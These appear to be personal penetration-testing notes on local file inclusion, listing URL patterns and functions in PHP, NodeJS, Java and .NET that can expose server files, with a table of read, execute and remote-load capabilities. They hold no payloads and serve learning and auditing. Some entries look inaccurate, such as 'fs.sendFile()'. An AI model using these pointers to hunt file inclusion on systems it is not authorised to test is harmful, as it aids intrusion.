# Local File Inclusion

* Local file inclusion can give access to local files hosted on the server
* these are common within templating engines which make every webpage look the same.
* what out for url formats like /index.php?page=about
* PHP
  * include() can be used to load a local or remote file
  * if it is taken from a user-controlled paramater, the code does not explicitly filter and sanitize the user input.
  * other vulnerable functions are:
    * include\_once(), require(), require\_once(), file\_get\_contents()
* NodeJS
  * Look for render() to read files
* java
  * In Java code, look for include or import
* .Net
  * Response.WriteFile
  * html.Partial
  * include

<table><thead><tr><th width="375">Function</th><th width="134">Read Content</th><th width="81">Execute</th><th>Remote URL</th></tr></thead><tbody><tr><td>PHP</td><td></td><td></td><td></td></tr><tr><td>include()/include_once()</td><td>Y</td><td>Y</td><td>Y</td></tr><tr><td>require()/require_once()</td><td>Y</td><td>Y</td><td>N</td></tr><tr><td>file_get_contents()</td><td>Y</td><td>N</td><td>Y</td></tr><tr><td>fopen()/file()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>NodeJS</td><td></td><td></td><td></td></tr><tr><td>fs.readFile()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>fs.sendFile()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>res.render()</td><td>Y</td><td>Y</td><td>N</td></tr><tr><td>Java</td><td></td><td></td><td></td></tr><tr><td>include</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>import</td><td>Y</td><td>Y</td><td>Y</td></tr><tr><td>.NET</td><td></td><td></td><td></td></tr><tr><td>@Html.Partial()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>@Html.RemotePartial()</td><td>Y</td><td>N</td><td>Y</td></tr><tr><td>Response.WriteFile()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>include</td><td>Y</td><td>Y</td><td>Y</td></tr></tbody></table>